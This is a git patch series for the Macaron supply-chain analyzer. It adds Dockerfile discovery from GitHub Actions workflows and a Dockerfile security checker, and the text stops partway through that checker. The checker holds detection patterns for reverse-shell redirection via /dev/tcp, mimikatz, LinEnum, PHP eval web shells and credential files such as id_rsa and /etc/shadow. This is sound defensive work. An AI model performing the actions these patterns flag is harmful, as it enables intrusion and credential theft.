From 07dbd0a37bdb9d2bdb6259f3a94488fbc87badc1 Mon Sep 17 00:00:00 2001 From: Achraf Maghous Date: Wed, 25 Jun 2025 11:48:30 +0100 Subject: [PATCH 1/3] feat: add Dockerfile analysis for build command detection Changes: -Function find_dockerfile_from_job: handles finding Dockerfile inside workflow in 2 cases of workflow jobs: -run and -uses. -Simple DockerNode class, so far it stores mainly the dockerfile path retrieved from workflow -Parsing Dockerfile using dockerfile-parse and RUN instruction commands using bashparser.py -Parsing and storing build commands found in Dockerfiles Signed-off-by: Achraf Maghous --- pyproject.toml | 2 + .../checks/build_script_check.py | 35 +++ .../ci_service/base_ci_service.py | 18 ++ .../ci_service/github_actions/analyzer.py | 282 +++++++++++++++++- .../github_actions/github_actions_ci.py | 50 +++- 5 files changed, 374 insertions(+), 13 deletions(-) diff --git a/pyproject.toml b/pyproject.toml index 74705364b..ce77300f3 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -38,6 +38,7 @@ dependencies = [ "problog >= 2.2.6,<3.0.0", "cryptography >=44.0.0,<45.0.0", "semgrep == 1.113.0", + "dockerfile-parse >= 2.0.1" ] keywords = [] # https://pypi.org/classifiers/ @@ -79,6 +80,7 @@ dev = [ "pylint >=3.0.3,<4.0.0", "cyclonedx-bom >=4.0.0,<5.0.0", "types-beautifulsoup4 >= 4.12.0,<5.0.0", + "types-dockerfile-parse >= 2.0.0" ] docs = [ "sphinx >=8.0.0,<9.0.0", diff --git a/src/macaron/slsa_analyzer/checks/build_script_check.py b/src/macaron/slsa_analyzer/checks/build_script_check.py index ccd61cca1..ebfcd62b3 100644 --- a/src/macaron/slsa_analyzer/checks/build_script_check.py +++ b/src/macaron/slsa_analyzer/checks/build_script_check.py @@ -107,12 +107,15 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: # we parse bash scripts that are reachable through CI only. result_tables: list[CheckFacts] = [] ci_services = ctx.dynamic_data["ci_services"] + for tool in build_tools: for ci_info in ci_services: ci_service: BaseCIService = ci_info["service"] # Checking if a CI service is discovered for this repo. if isinstance(ci_service, NoneCIService): continue + + # Process regular workflow build commands try: for build_command in ci_service.get_build_tool_commands( callgraph=ci_info["callgraph"], build_tool=tool @@ -148,6 +151,38 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: except CallGraphError as error: logger.debug(error) + # Process Docker build commands if the CI service has the method + if hasattr(ci_service, "get_docker_build_commands"): + try: + for build_command in ci_service.get_docker_build_commands( + callgraph=ci_info["callgraph"], build_tool=tool + ): + logger.debug("Processing Docker build command %s", build_command) + # For Dockerfile, link to the Dockerfile itself + relative_path = os.path.relpath(build_command["ci_path"], ctx.component.repository.fs_path) + trigger_link = ci_service.api_client.get_file_link( + ctx.component.repository.full_name, + ctx.component.repository.commit_sha, + relative_path, + ) + logger.debug("Trigger link for Docker build command: %s", trigger_link) + + result_tables.append( + BuildScriptFacts( + build_tool_name=tool.name, + ci_service_name=ci_service.name, + build_trigger=trigger_link, + language=build_command["language"], + language_distributions=None, + language_versions=None, + language_url=None, + build_tool_command=tool.serialize_to_json(build_command["command"]), + confidence=Confidence.HIGH, + ) + ) + except CallGraphError as error: + logger.debug(error) + return CheckResultData(result_tables=result_tables, result_type=CheckResultType.PASSED) diff --git a/src/macaron/slsa_analyzer/ci_service/base_ci_service.py b/src/macaron/slsa_analyzer/ci_service/base_ci_service.py index adaa3ce95..a6372c189 100644 --- a/src/macaron/slsa_analyzer/ci_service/base_ci_service.py +++ b/src/macaron/slsa_analyzer/ci_service/base_ci_service.py @@ -280,6 +280,24 @@ def get_third_party_configurations(self) -> list[str]: """ return [] + def get_docker_build_commands(self, callgraph: CallGraph, build_tool: BaseBuildTool) -> Iterable[BuildToolCommand]: + """ + Traverse the callgraph and find all the reachable Docker build commands. + + Parameters + ---------- + callgraph: CallGraph + The callgraph reachable from the CI workflows. + + Yields + ------ + BuildToolCommand + The object that contains the Docker build command as well useful contextual information. + """ + # By default we assume that there is no Docker build command available for a CI service. + # Each CI service should override this method if a Docker build command is generated for it. + raise CallGraphError("There is no Docker build command for this CI service.") + class NoneCIService(BaseCIService): """This class can be used to initialize an empty CI service.""" diff --git a/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py b/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py index 4565c2098..16b9afaad 100644 --- a/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py +++ b/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py @@ -11,6 +11,8 @@ from enum import Enum from typing import Any, TypeGuard, cast +from dockerfile_parse import DockerfileParser + from macaron.code_analyzer.call_graph import BaseNode from macaron.config.global_config import global_config from macaron.errors import CallGraphError, GitHubActionsValueError, ParseError @@ -23,6 +25,7 @@ Job, NormalJob, ReusableWorkflowCallJob, + RunStep, Step, Workflow, is_action_step, @@ -120,6 +123,39 @@ def __str__(self) -> str: return f"GitHubJobNode({self.name})" +class DockerNode(BaseNode): + """This class represents a callgraph node for when a Dockerfile is used as a build tool.""" + + def __init__( + self, + caller: BaseNode, + dockerfile_path: str, + node_id: str | None = None, + ) -> None: + """Initialize instance. + + Parameters + ---------- + caller : GithubWorkflowNode + The caller node. + build_tools_in_dockerfile : list + The list of build tools found in the Dockerfile. + node_id : str | None + The unique identifier of a node in the callgraph. + dockerfile_path : str | None + The path to the Dockerfile. + """ + super().__init__( + caller=caller, + node_id=node_id, + ) + self.dockerfile_path = dockerfile_path + # Add this node to caller's callee list if not already added + if caller and self not in caller.callee: + caller.add_callee(self) + logger.info("DockerNode successfully created and added to the caller's callee list.") + + def is_parsed_obj_workflow( parsed_obj: Workflow | Identified[ReusableWorkflowCallJob] | ActionStep, ) -> TypeGuard[Workflow]: @@ -277,16 +313,117 @@ def find_language_setup_action(job_node: GitHubJobNode, lang_name: BuildLanguage return None -def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None: - """Analyze the GitHub Actions node to build the call graph. +def find_dockerfile_from_job(job_node: GitHubJobNode, repo_path: str) -> str | None: + """ + Find the Dockerfile used in a GitHub Actions job. Parameters ---------- - node : GitHubWorkflowNode - The node for a single GitHub Actions workflow. + job_node: GitHubJobNode + The target GitHub Actions job node. repo_path: str - The file system path to the repo. + The path to the target repository. + + Returns + ------- + str | None + The path to the Dockerfile or None if not found. """ + logger.info("Finding Dockerfile in job node: %s", job_node.name) + # Get steps directly from the job node's parsed object + steps = job_node.parsed_obj.obj.get("steps", []) + if isinstance(steps, list): + for step in steps: + # Handle 'run' steps with docker build command + if not is_action_step(step) and "run" in step: + run_cmd = step["run"] + if "docker build" in run_cmd: + # Extract --file or -f argument + match = re.search(r"(?:--file|-f)\s+([^\s]+)", run_cmd) + if match: + dockerfile_path = match.group(1) + # Check if the Dockerfile path is absolute or relative + logger.debug("dockerfile_path in run step: %s", dockerfile_path) + return ( + os.path.join(repo_path, dockerfile_path) + if not os.path.isabs(dockerfile_path) + else dockerfile_path + ) + # Default to 'Dockerfile' in the build context + context_match = re.search(r"docker build\s+([^\s]+)", run_cmd) + context_path = context_match.group(1) if context_match else "." + dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile") + return dockerfile_path + + # Handle 'uses' steps with docker-related actions + if "uses" in step: + uses_action = step["uses"] + # Check for docker/build-push-action or similar + if any( + docker_action in uses_action + for docker_action in [ + "docker/build-push-action", + "docker/setup-buildx-action", + "docker-build-push", # Variations I found the most common + ] + ): + # Check if there's a 'with' section + if "with" in step: + with_section = step["with"] + + # Check for 'file' parameter (Dockerfile path) + if "file" in with_section: + dockerfile_path = with_section["file"] + return ( + os.path.join(repo_path, dockerfile_path) + if not os.path.isabs(dockerfile_path) + else dockerfile_path + ) + + # Check for 'context' parameter (might have Dockerfile in that directory) + if "context" in with_section and "file" not in with_section: + context_path = with_section["context"] + # Default to Dockerfile in the context directory + dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile") + if os.path.exists(dockerfile_path): + return dockerfile_path + + # If no file specified, check for default Dockerfile + default_dockerfile = os.path.join(repo_path, "Dockerfile") + if os.path.exists(default_dockerfile): + logger.debug("Using default Dockerfile location") + return default_dockerfile + + return None + + +def parse_run_commands(dockerfile_path: str) -> list[str]: + """Parse the RUN commands from a Dockerfile. + + Parameters + ---------- + dockerfile_path: str + The path to the Dockerfile. + + Returns + ------- + list[str] + A list of RUN commands found in the Dockerfile. + """ + try: + run_cmds = [] + with open(dockerfile_path, encoding="utf-8") as dockerfile: + dfp = DockerfileParser(fileobj=dockerfile) + for instruction in dfp.structure: + if instruction["instruction"] == "RUN": + run_cmds.append(instruction["value"]) + return run_cmds + except Exception as error: + raise CallGraphError(f"Error parsing Dockerfile at {dockerfile_path}: {error}") from error + + +def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None: + """Analyze the GitHub Actions node to build the call graph.""" if not is_parsed_obj_workflow(node.parsed_obj): return jobs = node.parsed_obj["jobs"] @@ -296,13 +433,102 @@ def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None node.add_callee(job_node) if is_normal_job(job): - # Add third-party workflows. - steps = job.get("steps") - if steps is None: + # Process steps + steps = job_node.parsed_obj.obj.get("steps") + if not isinstance(steps, list): continue - for step in steps: + + for step_idx, step in enumerate(steps): + # First check if this step uses Docker + dockerfile_path = None + step_id = step.get("id", f"step_{step_idx}") + + # Check for Docker usage in this specific step + if "run" in step: + run_cmd = step["run"] + if "docker build" in run_cmd: + # Extract Dockerfile path from docker build command + match = re.search(r"(?:--file|-f)\s+([^\s]+)", run_cmd) + if match: + dockerfile_path = match.group(1) + dockerfile_path = ( + os.path.join(repo_path, dockerfile_path) + if not os.path.isabs(dockerfile_path) + else dockerfile_path + ) + else: + # Default to 'Dockerfile' in the build context + context_match = re.search(r"docker build\s+([^\s]+)", run_cmd) + context_path = context_match.group(1) if context_match else "." + dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile") + + elif "uses" in step: + uses_action = step["uses"] + # Check for docker-related actions + if any( + docker_action in uses_action + for docker_action in [ + "docker/build-push-action", + "docker/setup-buildx-action", + "docker-build-push", + ] + ): + if "with" in step: + with_section = step["with"] + if "file" in with_section: + dockerfile_path = ( + with_section["file"] + if isinstance(with_section, dict) and "file" in with_section + else "" + ) + dockerfile_path = ( + os.path.join(repo_path, str(dockerfile_path)) + if not os.path.isabs(str(dockerfile_path)) + else dockerfile_path + ) + + # If we found a Dockerfile process it + if dockerfile_path: + + # Create a DockerNode for this step + docker_node = DockerNode( + node_id=f"{job_name}_{step_id}_docker", + caller=job_node, + dockerfile_path=dockerfile_path, + ) + if docker_node: + job_node.add_callee(docker_node) + logger.info("Created DockerNode with id: %s", docker_node.node_id) + + # Parse RUN commands from Dockerfile + try: + run_cmds = parse_run_commands(dockerfile_path) + logger.info("RUN commands found in Dockerfile %s", run_cmd) + + for run_cmd in run_cmds: + try: + # Create a minimal step AST that contains the run command + docker_step_ast = RunStep(run=run_cmd) + + docker_bash_node = create_bash_node( + name="Dockerfile-RUN", + node_id=f"{job_name}_{step_id}_docker_run_", + node_type=BashScriptType.INLINE, + source_path=dockerfile_path, + ci_step_ast=docker_step_ast, + repo_path=repo_path, + caller=docker_node, + recursion_depth=0, + ) + docker_node.add_callee(docker_bash_node) + except CallGraphError as error: + logger.error("Error creating BashNode for Dockerfile RUN command %s", error) + except CallGraphError as error: + logger.error("Error parsing Dockerfile at %s: %s", dockerfile_path, error) + + # Now handle the regular step processing if is_action_step(step): - # TODO: change source_path for external workflows. + # External action that's not Docker-related (or is Docker but we already handled it) action_name = step["uses"] external_node = GitHubWorkflowNode( name=action_name, @@ -340,11 +566,41 @@ def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None caller=job_node, recursion_depth=0, ) + job_node.add_callee(callee) + + # Check if this step uses Docker build + run_cmd = str(step.get("run", "")) + if "docker build" in run_cmd: + # Find the Dockerfile path from the docker build command + dockerfile_path = None + match = re.search(r"(?:--file|-f)\s+([^\s]+)", run_cmd) + if match: + dockerfile_path = match.group(1) + dockerfile_path = ( + os.path.join(repo_path, dockerfile_path) + if not os.path.isabs(dockerfile_path) + else dockerfile_path + ) + else: + # Default to 'Dockerfile' in the build context + context_match = re.search(r"docker build\s+([^\s]+)", run_cmd) + context_path = context_match.group(1) if context_match else "." + dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile") + + # If Dockerfile exists, parse it + if dockerfile_path and os.path.exists(dockerfile_path): + logger.info("Found Dockerfile at %s", dockerfile_path) + docker_node = DockerNode( + node_id=f"{job_name}_{node_id}_docker" if node_id else f"{job_name}_docker", + caller=job_node, + dockerfile_path=dockerfile_path, + ) + if docker_node: + logger.info("Adding DockerNode for Dockerfile %s", dockerfile_path) + job_node.add_callee(docker_node) except CallGraphError as error: logger.debug(error) continue - job_node.add_callee(callee) - elif is_reusable_workflow_call_job(job): workflow_call_job_with_id = Identified[ReusableWorkflowCallJob](job_name, job) # Add reusable workflows. @@ -360,6 +616,8 @@ def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None reusable_node.model = create_third_party_action_model(reusable_node) job_node.add_callee(reusable_node) + node.add_callee(job_node) + def build_call_graph_from_path(root: BaseNode, workflow_path: str, repo_path: str, macaron_path: str = "") -> BaseNode: """Build the call Graph for GitHub Actions workflows. diff --git a/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py b/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py index 43c4e3f0e..f3cfb5b08 100644 --- a/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py +++ b/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py @@ -1,4 +1,4 @@ -# Copyright (c) 2022 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module analyzes GitHub Actions CI.""" @@ -18,6 +18,7 @@ from macaron.slsa_analyzer.build_tool.base_build_tool import BaseBuildTool, BuildToolCommand from macaron.slsa_analyzer.ci_service.base_ci_service import BaseCIService from macaron.slsa_analyzer.ci_service.github_actions.analyzer import ( + DockerNode, GitHubJobNode, GitHubWorkflowNode, GitHubWorkflowType, @@ -706,3 +707,50 @@ def get_third_party_configurations(self) -> list[str]: The list of third-party CI configuration files """ return self.third_party_configurations + + def get_docker_build_commands(self, callgraph: CallGraph, build_tool: BaseBuildTool) -> Iterable[BuildToolCommand]: + """Traverse the callgraph and find all Docker RUN commands that use build tools. + + Parameters + ---------- + callgraph: CallGraph + The callgraph reachable from the CI workflows. + build_tool: BaseBuildTool + The corresponding build tool for which shell commands need to be detected. + + Yields + ------ + BuildToolCommand + The object that contains the build command from Dockerfile RUN instructions. + """ + for node in callgraph.bfs(): + # Look for DockerNode instances + if isinstance(node, DockerNode) and hasattr(node, "dockerfile_path"): + dockerfile_path = node.dockerfile_path + + # Find the parent workflow for context + workflow_node = None + parent = node.caller + while parent: + if isinstance(parent, GitHubWorkflowNode): + workflow_node = parent + break + parent = parent.caller if hasattr(parent, "caller") else None + + # Check all BashNode children of this DockerNode + for child in node.callee: + if isinstance(child, BashNode): + # Check each command in the bash node + for cmd in child.parsed_bash_obj.get("commands", []): + if build_tool.is_build_command(cmd): + yield BuildToolCommand( + ci_path=dockerfile_path, + command=cmd, + step_node=child, + language=build_tool.language, + language_versions=None, + language_distributions=None, + language_url=None, + reachable_secrets=[], + events=get_ci_events(workflow_node) if workflow_node else [], + ) From 3456d3cf1a5e871e3d24bc7a7555c2f03b3889fa Mon Sep 17 00:00:00 2001 From: Achraf Maghous Date: Wed, 2 Jul 2025 15:21:19 +0100 Subject: [PATCH 2/3] feat: add dockerfile checker for insecure patterns Changes: -Created security analyzer for Dockerfile following current available literature emphasizing: Use of outdated or insecure base images (FROM) Running containers as root (USER) Copying sensitive files into the image (COPY, ADD) Exposing insecure ports (EXPOSE) Environment variable leaks (ENV) Mounting unsafe host directories (VOLUME) Use of potentially dangerous shell commands (RUN) Signed-off-by: Achraf Maghous --- .../insecure_patterns_dockerfile_check.py | 616 ++++++++++++++++++ 1 file changed, 616 insertions(+) create mode 100644 src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py diff --git a/src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py b/src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py new file mode 100644 index 000000000..aa6710792 --- /dev/null +++ b/src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py @@ -0,0 +1,616 @@ +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""This module contains the DockerfileSecurityCheck class with security analysis based on DFScan research.""" + +import json +import logging +import os +import re +from io import StringIO + +from dockerfile_parse import DockerfileParser +from sqlalchemy import ForeignKey, Integer, String +from sqlalchemy.orm import Mapped, mapped_column + +from macaron.database.db_custom_types import DBJsonDict +from macaron.database.table_definitions import CheckFacts +from macaron.json_tools import JsonType +from macaron.slsa_analyzer.analyze_context import AnalyzeContext +from macaron.slsa_analyzer.checks.base_check import BaseCheck +from macaron.slsa_analyzer.checks.check_result import CheckResultData, CheckResultType, Confidence, JustificationType +from macaron.slsa_analyzer.registry import registry +from macaron.slsa_analyzer.slsa_req import ReqName + +logger: logging.Logger = logging.getLogger(__name__) + + +class DockerfileSecurityFacts(CheckFacts): + """The ORM mapping for justifications in dockerfile security check.""" + + __tablename__ = "_dockerfile_security_check" + + #: The primary key. + id: Mapped[int] = mapped_column(ForeignKey("_check_facts.id"), primary_key=True) # noqa: A003 + + #: The name of the base image used in the Dockerfile. + base_image_name: Mapped[str] = mapped_column(String, nullable=False, info={"justification": JustificationType.TEXT}) + + #: The version of the base image used in the Dockerfile. + base_image_version: Mapped[str] = mapped_column( + String, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: Security vulnerabilities found in the Dockerfile. + security_issues: Mapped[dict[str, JsonType]] = mapped_column( + DBJsonDict, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: Security risk score (0-100, higher is more risky). + risk_score: Mapped[int] = mapped_column(Integer, nullable=False, info={"justification": JustificationType.TEXT}) + + #: Number of security issues found. + issues_count: Mapped[int] = mapped_column(Integer, nullable=False, info={"justification": JustificationType.TEXT}) + + __mapper_args__ = { + "polymorphic_identity": "dockerfile_security_check", + } + + +class DockerfileSecurityAnalyzer: + """Security analyzer for Dockerfiles based on DFScan research.""" + + # Security rules from DFScan research + RISKY_PORTS = [21, 22, 23, 3306] + PRIVILEGED_PORTS = list(range(1, 1024)) + SAFE_PRIVILEGED_PORTS = [80, 443] + + SENSITIVE_ENV_KEYWORDS = ["pass", "pswd", "license", "token", "session", "KEY", "AUTHORIZED", "secret"] + + EMAIL_REGEX = re.compile(r"[A-Za-z0-9\u4e00-\u9fa5]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+") + + UNSAFE_VOLUMES = [ + "/proc", + "/", + "/root/.ssh", + "/var/run/docker.sock", + "/var/lib/docker", + "/etc/docker", + "Docker.service", + "Docker.socket", + "/etc/default/docker", + "/etc/docker/daemon.JSON", + "/etc/sysconfig/docker", + "/usr/bin/containerd", + "/usr/sbin/runc", + ] + + SENSITIVE_FILES = [ + "NOTICE", + "README.md", + "LICENSE", + "AUTHORS.md", + "CONTRIBUTING.md", + ".vscode/", + "vendor/", + "env/", + "ENV/", + "build/", + "dist/", + "target/", + "downloads/", + "eggs/", + ".eggs/", + "lib/", + "lib64/", + "parts/", + "sdist/", + "var/", + "Dockerfile", + ".git", + ".editorconfig", + "*.egg-info/", + ".installed.cfg", + "*.egg", + "*.manifest", + "*.spec", + ".gcloudignore", + ".gitignore", + ".tox/", + ".dockerignore", + ".coverage", + ".coverage.*", + ".cache", + "htmlcov/", + "nosetests.xml", + "coverage.xml", + "*,cover", + ".hypothesis/", + "ssh/", + "id_rsa", + ".git-credentials", + "config.*", + ] + + SECURITY_CRITICAL_FILES = [ + "id_rsa", + "id_rsa.pub", + ".ssh", + "shadow", + "/etc/passwd", + "/etc/group", + "/etc/profile", + ".bash_history", + ".history", + ".log", + ".conf", + ] + + MALICIOUS_RUN_PATTERNS = [ + r">&/dev/tcp/", + r"&>/dev/tcp", + r"crontab", + r"LinEnum\.sh", + r"mimikatz", + r"@eval\(\$_POST", + r"@eval\(\$_GET", + r"@eval\(\$_REQUEST", + r"chmod 777", + ] + + def __init__(self) -> None: + """Initialize the analyzer.""" + self.issues: list[dict[str, str]] = [] + self.risk_score: int = 0 + + def analyze_dockerfile_content(self, dockerfile_content: str) -> tuple[list[dict[str, str]], int, str, str]: + """ + Analyze Dockerfile content for security issues. + + Parameters + ---------- + dockerfile_content : str + Content of the Dockerfile as string + + Returns + ------- + tuple[list[dict[str, str]], int, str, str] + tuple of (issues_list, risk_score, base_image_name, base_image_version) + """ + self.issues = [] + self.risk_score = 0 + + base_image_name = "unknown" + base_image_version = "unknown" + + try: + # Use dockerfile-parse with fileobj argument + dockerfile_fileobj = StringIO(dockerfile_content) + parser = DockerfileParser(fileobj=dockerfile_fileobj) + + # Extract base image info + base_image_name, base_image_version = self._get_base_image_info(parser) + + # Parse the structure + structure = parser.structure + + for item in structure: + instruction_type = item.get("instruction", "").upper() + instruction_value = item.get("value", "") + + if instruction_type == "FROM": + self._check_from_instruction(instruction_value) + elif instruction_type == "USER": + self._check_user_instruction(instruction_value) + elif instruction_type == "EXPOSE": + self._check_expose_instruction(instruction_value) + elif instruction_type == "ENV": + self._check_env_instruction(instruction_value) + elif instruction_type == "VOLUME": + self._check_volume_instruction(instruction_value) + elif instruction_type == "COPY": + self._check_copy_instruction(instruction_value) + elif instruction_type == "ADD": + self._check_add_instruction(instruction_value) + elif instruction_type == "RUN": + self._check_run_instruction(instruction_value) + + except json.JSONDecodeError as e: + logger.error("Error parsing Dockerfile: %s", e) + self._add_issue("ERROR", "PARSE", f"Failed to parse Dockerfile: {str(e)}", 5) + + return self.issues, self.risk_score, base_image_name, base_image_version + + def _get_base_image_info(self, parser: DockerfileParser) -> tuple[str, str]: + """ + Extract base image name and version from DockerfileParser. + + Parameters + ---------- + parser : DockerfileParser + The dockerfile parser instance + + Returns + ------- + tuple[str, str] + tuple of (image_name, image_version) + """ + try: + # Get the base image + base_image = parser.baseimage + if base_image: + # Split image name and tag + if ":" in base_image: + image_name, image_version = base_image.split(":", 1) + else: + image_name = base_image + image_version = "latest" + return image_name, image_version + + except AttributeError as e: + logger.debug("Error extracting base image info: %s", e) + + return "unknown", "unknown" + + def _add_issue(self, severity: str, instruction: str, issue: str, risk_points: int = 0) -> None: + """Add a security issue to the results.""" + self.issues.append( + {"severity": severity, "instruction": instruction, "issue": issue, "risk_points": str(risk_points)} + ) + self.risk_score += risk_points + + def _check_from_instruction(self, content: str) -> None: + """Check FROM instruction for security issues.""" + # Extract image name and tag + image_parts = content.split(":") + image_name = image_parts[0] + tag = image_parts[1] if len(image_parts) > 1 else "latest" + + # Check for latest tag usage + if tag == "latest" or len(image_parts) == 1: + self._add_issue( + "MEDIUM", "FROM", f"Using 'latest' tag or no tag specified for base image: {image_name}", 15 + ) + + # Check for old base image (simplified - would need Docker Hub API integration) + self._check_base_image_age(image_name, tag) + + def _check_base_image_age(self, image_name: str, tag: str) -> None: + """Check if base image is too old (simplified implementation).""" + try: + # This would require Docker Hub API integration + # For now, just warn about common old tags + old_patterns = ["ubuntu:14.04", "ubuntu:16.04", "centos:6", "centos:7", "python:2.7"] + full_image = f"{image_name}:{tag}" + + for old_pattern in old_patterns: + if old_pattern in full_image: + self._add_issue("HIGH", "FROM", f"Using potentially outdated base image: {full_image}", 25) + break + except AttributeError as e: + logger.debug("Error checking base image age: %s", e) + + def _check_user_instruction(self, content: str) -> None: + """Check USER instruction for root usage.""" + if content.strip().lower() in {"root", "0"}: + self._add_issue("HIGH", "USER", "Running container as root user poses security risks", 30) + + def _check_expose_instruction(self, content: str) -> None: + """Check EXPOSE instruction for risky ports.""" + try: + # Handle both space-separated and single port formats + port_strings = content.split() + ports: list[int] = [] + + for port_str in port_strings: + # Handle port ranges and protocols (e.g., "8080/tcp") + port_str = port_str.split("/")[0] # Remove protocol if present + if "-" in port_str: + # Handle port ranges + start_port, end_port = port_str.split("-") + ports.extend(range(int(start_port), int(end_port) + 1)) + else: + ports.append(int(port_str)) + + for port in ports: + if port in self.RISKY_PORTS: + self._add_issue("HIGH", "EXPOSE", f"Exposing risky port {port} (SSH/FTP/MySQL/Telnet)", 25) + elif port in self.PRIVILEGED_PORTS and port not in self.SAFE_PRIVILEGED_PORTS: + self._add_issue("MEDIUM", "EXPOSE", f"Exposing privileged port {port}", 15) + except (ValueError, AttributeError) as e: + logger.debug("Could not parse ports from EXPOSE instruction: %s", e) + + def _check_env_instruction(self, content: str) -> None: + """Check ENV instruction for sensitive information.""" + # Check for sensitive keywords + content_lower = content.lower() + for keyword in self.SENSITIVE_ENV_KEYWORDS: + if keyword.lower() in content_lower: + self._add_issue( + "HIGH", "ENV", f"Potentially sensitive information in environment variable: {keyword}", 20 + ) + + # Check for email addresses + if self.EMAIL_REGEX.search(content): + self._add_issue("MEDIUM", "ENV", "Email address found in environment variable", 10) + + def _check_volume_instruction(self, content: str) -> None: + """Check VOLUME instruction for unsafe mounts.""" + # Parse volume instruction - can be JSON array or space-separated + volumes = [] + + if content.strip().startswith("["): + # JSON array format + try: + volumes = json.loads(content) + except json.JSONDecodeError: + # Fallback to string parsing + volumes = [v.strip().strip("\"'") for v in content.strip("[]").split(",")] + else: + # Space-separated format + volumes = [v.strip().strip("\"'") for v in content.split()] + + for volume in volumes: + for unsafe_vol in self.UNSAFE_VOLUMES: + if volume == unsafe_vol or volume.startswith(unsafe_vol): + self._add_issue("CRITICAL", "VOLUME", f"Unsafe volume mount detected: {volume}", 40) + + def _check_copy_instruction(self, content: str) -> None: + """Check COPY instruction for sensitive files.""" + # Parse COPY instruction arguments + parts = content.split() + if not parts: + return + + # COPY can have multiple sources, last argument is destination + sources = parts[:-1] if len(parts) > 1 else parts + + for source in sources: + # Check for wildcard usage + if source == ".": + self._add_issue( + "MEDIUM", "COPY", "Using '.' as source copies entire build context including sensitive files", 15 + ) + + # Check for sensitive files + self._check_file_sensitivity("COPY", source) + + def _check_add_instruction(self, content: str) -> None: + """Check ADD instruction for security issues.""" + parts = content.split() + if not parts: + return + + # ADD can have multiple sources, last argument is destination + sources = parts[:-1] if len(parts) > 1 else parts + + for source in sources: + # Check for URL usage + if source.startswith(("http://", "https://", "ftp://")): + self._add_issue("HIGH", "ADD", f"ADD instruction downloading from URL: {source}", 25) + + # Check for compressed files + if any(source.endswith(ext) for ext in [".tar", ".tar.gz", ".tgz", ".zip"]): + self._add_issue("MEDIUM", "ADD", f"ADD instruction with compressed file: {source}", 15) + + # Same checks as COPY + if source == ".": + self._add_issue( + "MEDIUM", "ADD", "Using '.' as source copies entire build context including sensitive files", 15 + ) + + self._check_file_sensitivity("ADD", source) + + def _check_file_sensitivity(self, instruction: str, filepath: str) -> None: + """Check if file path contains sensitive information.""" + for sensitive_file in self.SENSITIVE_FILES: + if sensitive_file in filepath: + self._add_issue("MEDIUM", instruction, f"Potentially sensitive file being copied: {filepath}", 10) + break + + for critical_file in self.SECURITY_CRITICAL_FILES: + if critical_file in filepath: + self._add_issue("CRITICAL", instruction, f"Security-critical file being copied: {filepath}", 35) + break + + def _check_run_instruction(self, content: str) -> None: + """Check RUN instruction for malicious commands.""" + for pattern in self.MALICIOUS_RUN_PATTERNS: + if re.search(pattern, content, re.IGNORECASE): + self._add_issue("CRITICAL", "RUN", f"Potentially malicious command detected: {pattern}", 40) + + +class DockerfileSecurityCheck(BaseCheck): + """This check analyzes Dockerfiles for security vulnerabilities based on DFScan research.""" + + def __init__(self) -> None: + """Initialize instance.""" + check_id = "mcn_dockerfile_security_1" + description = """This check analyzes Dockerfiles for security vulnerabilities and best practices + based on DFScan research findings. It examines Docker instructions for potential security risks + including root user usage, risky port exposure, sensitive information leakage, unsafe volume mounts, + and malicious commands.""" + depends_on: list[tuple[str, CheckResultType]] = [] + eval_reqs = [ReqName.SCRIPTED_BUILD] + super().__init__( + check_id=check_id, + description=description, + depends_on=depends_on, + eval_reqs=eval_reqs, + result_on_skip=CheckResultType.FAILED, + ) + + def run_check(self, ctx: AnalyzeContext) -> CheckResultData: + """ + Implement the check in this method. + + Parameters + ---------- + ctx : AnalyzeContext + The object containing processed data for the target repo. + + Returns + ------- + CheckResultData + The result of the check. + """ + result_tables: list[CheckFacts] = [] + + try: + # Find and read Dockerfile content + dockerfile_content = self._get_dockerfile_content(ctx) + if not dockerfile_content: + logger.debug("No Dockerfile found in repository") + return CheckResultData(result_tables=result_tables, result_type=CheckResultType.FAILED) + + # Analyze the Dockerfile + analyzer = DockerfileSecurityAnalyzer() + issues, risk_score, base_image_name, base_image_version = analyzer.analyze_dockerfile_content( + dockerfile_content + ) + + # Determine confidence and result type based on risk score and issues + if risk_score >= 100: + result_type = CheckResultType.FAILED + confidence = Confidence.HIGH + elif risk_score >= 50: + result_type = CheckResultType.FAILED + confidence = Confidence.MEDIUM + elif risk_score > 0: + result_type = CheckResultType.PASSED + confidence = Confidence.MEDIUM + else: + result_type = CheckResultType.PASSED + confidence = Confidence.HIGH + + # Create detailed security issues dictionary + security_issues_dict = { + "total_issues": len(issues), + "risk_score": risk_score, + "issues_by_severity": {}, + "issues_by_instruction": {}, + "detailed_issues": issues, + } + + # Group issues by severity and instruction + for issue in issues: + severity = issue.get("severity", "UNKNOWN") + instruction = issue.get("instruction", "UNKNOWN") + + # Ensure the dicts are actually dicts 